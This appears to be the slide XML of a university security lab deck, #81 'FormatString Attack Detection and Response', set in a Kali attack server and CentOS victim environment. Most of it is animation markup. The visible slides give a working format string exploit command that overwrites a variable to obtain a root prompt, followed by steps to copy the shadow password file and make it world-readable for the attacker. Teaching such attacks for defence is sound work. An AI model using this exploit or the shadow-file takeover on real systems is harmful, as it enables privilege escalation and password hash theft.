                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">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10">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0">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">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10">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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9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7" grpId="0" animBg="1"/>
      <p:bldP spid="70" grpId="0" animBg="1"/>
      <p:bldP spid="47"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923407"/>
            <a:ext cx="5472608" cy="1047979"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack so that the value of the pass variable is 144, and note that the command input window to execute as root privilege.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337123" y="4476791"/>
            <a:ext cx="6874966" cy="2088232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="1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dirty="0"/>
              <a:t>In step 6, attack so that the value of the pass variable is 144, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>and note that the command input window to execute as root privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Type command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> $ (python -c 'print "\ xd0 \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>" + "% 08x% 08x% 08x% 08x% 08x% 08x% 08x% 08x% 76x% n"') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Here, we still use nine pops , but the ninth pop uses %76x not %08x.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>“\xd0 \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>xb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>” (4 byte) + “%08x" x 8 pieces (64 byte) + “%76x” (76 byte) = 144. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>The value of the variable pass was changed to 144, and a prompt to execute the command with root privilege is appeared.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Note “% 76x” in the middle of the command.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="shape1407"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365358" y="2210519"/>
            <a:ext cx="5485287" cy="1592618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="직사각형 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864355" y="6228999"/>
            <a:ext cx="623133" cy="224337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="2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6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287889" y="2408552"/>
            <a:ext cx="288032" cy="128604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="2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6515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923407"/>
            <a:ext cx="5472608" cy="383375"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shadow file takeover</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600056" y="1306782"/>
            <a:ext cx="5328592" cy="89808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dirty="0"/>
              <a:t>Now, as a root, you can copy shadow file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>and change the mode that everybody can read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="shape1408"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="353151" y="1349376"/>
            <a:ext cx="5403215" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="shape1409"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="384184" y="1778412"/>
            <a:ext cx="5403215" cy="561340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="shape1410"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="836801" y="2924944"/>
            <a:ext cx="5403215" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="shape1411"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="836800" y="4982344"/>
            <a:ext cx="5403215" cy="1558925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6602185" y="2920164"/>
            <a:ext cx="5328592" cy="208823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dirty="0"/>
              <a:t>Then, at attacker terminal you takeover shadow file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Attacker can copy and view the shadow file.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17583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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23"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CE533C-1559-4D06-A824-31DB14FD4A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="47270"/>
            <a:ext cx="11033871" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CYBER AEGIS for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Handong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Global Univ.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#81. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack Detection and Response</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5202A806-1499-418F-A642-BCCB3F524DB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551384" y="1279956"/>
            <a:ext cx="8946541" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
              <a:t>A. Overview </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>We can detect and respond to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> attacks. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F17B77-DE52-4FA2-B50D-EE00808AA86D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551384" y="2931869"/>
            <a:ext cx="6096000" cy="918713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" latinLnBrk="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="100" dirty="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B. Lab Environment </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" kern="100" dirty="0">
              <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack Server (Kali-Linux) + Victim Server (CentOS 5.5) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="shape1361">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73601B0-258E-47FE-AD00-946323DF30F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71464" y="3861048"/>
            <a:ext cx="6313785" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D8DE68D-8896-4236-A695-5FFD4723B61E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075384" y="5373216"/>
            <a:ext cx="9277200" cy="1296144"/>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sz="1400" kern="0" dirty="0"/>
              <a:t>#81’s LAB overview is that we can detect and respond to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The lab environment is consisted of Attack Server and Victim Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
